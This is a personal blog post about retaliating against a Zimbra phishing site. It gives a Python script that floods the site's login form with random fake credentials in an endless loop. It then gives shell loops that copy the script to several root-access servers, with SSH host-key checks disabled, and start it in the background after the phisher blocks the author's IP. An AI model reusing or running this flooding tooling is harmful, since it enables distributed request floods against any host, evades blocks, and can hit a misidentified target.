Cristian Livadaru's Blog

Cristian Livadaru's Blog


My personal view on things

Share


Tags


Twitter


How to deal with phishing sites

I've been receiving some phishing mails aimed at Zimbra users. I could just delete and ignore them, but where's the fun in that?

Cristian LivadaruCristian Livadaru

Instead of just deleting the mail, I thought to strike back and flood the site with some fake data.
First, you need some proxy or a new server, you could use DigitalOcean for example.
Then you need to get the form fields that need to be filled:

2018-08-01_15-54-42

Put everything in this python script (source: https://en.internetwache.org/pwning-a-paypal-phishing-site-11-03-2013/)

#!/usr/bin/python2.7
 
import random
import urllib2
import urllib
 
SPAMURL="***"
 
def randstr(leng):
    res = ""
    for i in xrange(0,leng):
        res = res + str(chr(random.randint(65,125)))
    return res
def sendSpamReq(url):
    data = urllib.urlencode({'username':randstr(8)+"@"+randstr(3)+".de",
                             'password':randstr(12)
   })
    urllib2.urlopen(urllib2.Request(url,data))
count = 0
while True: 
    count=count+1
    try:
        sendSpamReq(SPAMURL)
        print "["+str(count)+"] Success"
    except:
        print "["+str(count)+"] Failed"

change the SPAMURL and the form fields accordingly (username and password in my case)
Run the script and leave it running, this will flood the phisher with a lot of fake data which will hopefully make the rest of the data they might have useless.

Update

Apparently, after 4k Mails, the phisher blocked my IP. Looks like someone want's to play. Ok, let's go, my friend.

2018-08-01_16-48-38

On your machine create a file called flood-hosts and add each IP of your server in this file, one line per IP.

Then copy the file to each server

for dest in $(<flood-hosts); do
  scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null flood.py root@${dest}:/root/
done

and start it

for dest in $(<flood-hosts); do
  ssh root@${dest} -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "nohup python flood.py > /dev/null 2>&1 &"
done

and you can start it several times of course.

Comments